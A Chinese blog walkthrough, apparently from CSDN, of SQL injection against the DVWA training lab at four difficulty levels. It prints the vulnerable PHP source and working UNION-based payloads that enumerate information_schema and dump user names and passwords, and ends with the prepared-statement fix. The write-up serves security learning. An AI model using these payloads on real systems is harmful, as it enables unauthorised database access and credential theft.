DVWA上SQL Injection的全难度

最新推荐文章于 2023-12-14 14:02:41 发布
最新推荐文章于 2023-12-14 14:02:41 发布
阅读量232 收藏
点赞数
文章标签: php Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74456293/article/details/128777607
版权

攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

SQL注入流程:

1、判断是否存在注入,注入时字符型还是数字型

输入1,能够正常返回用户名和密码

在1后面加上’,报错,说明此处存在注入点。

接下来,判断字符型还是数字型,判断方法如下:

数字型:

(1)在URL的注入点中输入 and 1=1,成功返回

​ 输入 and 1=2,依然成功返回,说明不是数字型,因为返回值没有受到数字的影响

(2)在URL或者表单中输入0 or 1,如果可以查到数据,说明是数字型注入

​ 同样地,依然查不到数据,确定不是数字型

字符型:

1’ and ‘1’='1

如果输入0’or 1#,查到数据说明是字符型注入

2、猜解SQL查询语句中的字段数

1’ order by 1 #

1’ order by 2 #

继续增加,加到3报错,说明这个表只有2列,也就是2个字段,可以看出有2个回显

3、确定显示位置/字段顺序

1’ union select 1,2 #

First name处显示结果位查询结果的第一列的值,surname处显示结果位查询结果第二列的值。

4、获取当前数据库

5、获取数据库中的表

6、获取表中的字段名

一、low难度

1、源码

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

2、判断是否存在注入,注入式字符型还是数字型

(1)输入 1,显示成功

(2)输入1’ and ‘1’ =’ 2,显示成功

说明存在字符型注入。

3、猜解SQL查询语句中的字段数

(1)输入1’ or 1=1 order by 1 #,查询成功

(2)输入1’ or 1=1 order by 2 #,查询成功

总结:说明执行的SQL查询语句只有两个字段,这里的是First name、Surname

4、确定显示的字段顺序

输入1 ' union select 1,2 # ,显示报错位

5、获取当前数据库

输入1 ' union select 1,database() #

说明现在当前的数据库是dvwa。

6、获取数据库中的表

1 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

7、获取表users中的字段

1 ' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' #

8、查找数据

1 ' union select group_concat(user),group_concat(password) from users #

二、Medium难度

1、源码

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

使用POST提交方式,还使用了转义预防SQL注入。

步骤与low难度同。

三、High难度

1、源码

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

使用了session 获取id 值,闭合方式单引号闭合。

四、Impossible难度

1、源码

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

CSRF、检测 id 是否是数字。 prepare 预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程;此外预编译语句能防止 SQL 注入。

踏雪寻玉
关注
20201224DVWA-SQL注入SQL inject)模块难度详解
qq_45290991的博客
01-12 342
目录 SQL注入的思路 low medium high SQL注入的思路 1.判断是否存在注入注入是字符型还是数字型 1’ 1 or 1=1# 2.猜解SQL查询语句中的字段数 orderby 4.获取当前数据库 database() 5.获取数据库中的表 table_name from informatio...
2019-2-28 dvwa学习(4)--sql注入级别impossible
weixin_42555985的博客
02-28 5014
继续把dvwa环境安级别调整为impossible 观察界面 看上去似乎和low级别没有大的区别,只是浏览器中get方法提交的参数多了一个。 impossible.php代码如下 &amp;lt;?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_...
DVWASQL Injection(Blind)难度
m0_74456293的博客
01-28 301
DVWASQL Injection(Blind)难度
DVWA-SQL注入难度
ethan18的博客
06-10 301
我想表达的是,我们可以直接通过抓包,来改变我们想要的请求。这就是最初级的,毫无安措施的版本,发现了注入点:因为我们发现我们输入的语句直接变成了在SQL语句中的报错,有两个相同的。如果这个注入点是数值型的话,那么当我输入1 and 1=2或者1 and 1=1的时候,在SQL语句中会自动变成。如果这个注入点是字符型的,那么当我输入1 and 1=2或者1 and 1=1的时候,在SQL语句中会自动变成。可以使用的方法挺多的,不过网上能够找到的基本都是使用Burpsuite来抓包,我们也可以这样。
dvwa靶场SQL Injectionsql注入难度教程(附代码分析)
m0_73248913的博客
04-04 1031
dvwa sql注入教程
DVWA靶场-SQL Injection难度低、中、高)-sqlmap自动化漏洞扫描
最新发布
weixin_43850721的博客
12-14 2847
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA——SQL Injection(Blind)【详细的步骤实现(图解)包含多种盲注方法并且附上了payload】
weixin_46709219的博客
01-04 746
一)区别: SQL盲注与一般注入的区别在于一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 二)思想: 在盲注中,页面无论对错都只会以 “是” 或者 “不是”来对我们的SQL语句进行结果的反馈,因此我们需要构造payload去询问例如“数据库名字的第一个字母是不是a?”,通过问答的方式最终获取我们想要的数据。 三)盲注分为基于布尔盲注、基于
DVWA--SQL Injection(SQL注入-非盲注)(难度)
wwxxee
03-03 382
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
DVWA--SQL Injection(Blind)(SQL盲注)(难度)
wwxxee
03-03 261
DVWASQL Injection (Blind)(SQL盲注) 原理参考:网络安笔记-99-渗透-SQL注入 逻辑 输入框输入ID,然后判断该ID是否存在 难度分级 Low 核心代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM u
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL InjectionSQL注入)是一种常见的Web应用程序安漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
DVWA下的SQL注入
07-25
SQL
[网络安] DVWASQL注入—Impossible level代码审计
热门推荐
等风来
04-26 1万+
使用 execute() 方法执行查询,使用 fetch() 方法获取查询结果中第一行的数据,并将其存储到 $row 数组中。然后判断 $data->rowCount() 的值是否为 1,确保只有一个结果被返回. 在 SQLite 中,使用局变量 $sqlite_db_connection 获取 SQLite 数据库连接对象,并使用 prepare() 方法准备 SQL 查询语句,在其中使用占位符 :id 代替 id 参数。 使用 bindValue() 方法将 id 参数绑定到占位符上,指定参数类型
DVWA的入侵SQL注入
qq_39911925的博客
10-30 546
DVWA攻击记录 LOW级别 SQL手工注入重现漏洞危害 前言>>>>在攻击开始前,我们至少要具备操作mysql的一些简单语句,否则可能此文章对阅读者的你存在困难,有朋友问这都什么年代了还会存在sql注入?其实做这个的时候是因为昨天我编写代码的时候写出了一个sql注入并且在上线的时候被朋友挖掘了出来,漏洞图如下,就因为我的一次逻辑判断错误而导致,所以今天想起了写一次sql注...
Dvwasql注入low到impossible级别详解
Cai1010110的博客
10-25 9451
在这里我所使用的的是Windows 10系统,dvwa+phpstudy_pro进行靶场练习,关于dvwa的介绍网上一搜一大把,在这里就不加以介绍了,我还是把实践内容介绍好吧!我从网上搜到各位大神操作步骤进行整理学习。 本文介绍SQL Injection的相关内容,后续内容会在之后的文章继续介绍。 小白学习中...... Low 后端控制代码 后端代码解析 1、isset()函数在...
DVWA-BruteFoce- Impossible
R4bbit
06-27 1421
0x01 初步分析 连续登陆两次后会提示,too many failed logins,try again in 15 minutes 包体结构 参数和之前DVWA-hight的没什么区别,如果重复使用一个token的话也是会302,继续使用pitchfork模式尝试 就在我看到返回是200的时候以为成功了, 觉得这个impossible难度和hight是一样的时候 由于是靶站,我们知道用户名是admin,密码是password,但是这里返回的结果仍然是too many fa...
DVWA_SQL注入低中等级讲解
Keiltest的博客
08-10 1063
本章讲解了sql注入
代码审计—DVWA—CSRF—impossible
王嘟嘟的博客
10-31 651
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 黑盒测试 要输入原来的密码,就此CSRF打住。 白盒测试 代码其实和high差不多,就是多了一个框框。防爆破,防注入啥的。 ...
DVWASQL注入
RexHa的博客
09-27 2134
DVWA靶场sql注入三个级别通关
DVWA上XSS(Stored)(存储跨站脚本) 难度
m0_74456293的博客
01-29 218
DVWA上XSS(Stored)(存储跨站脚本) 难度
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值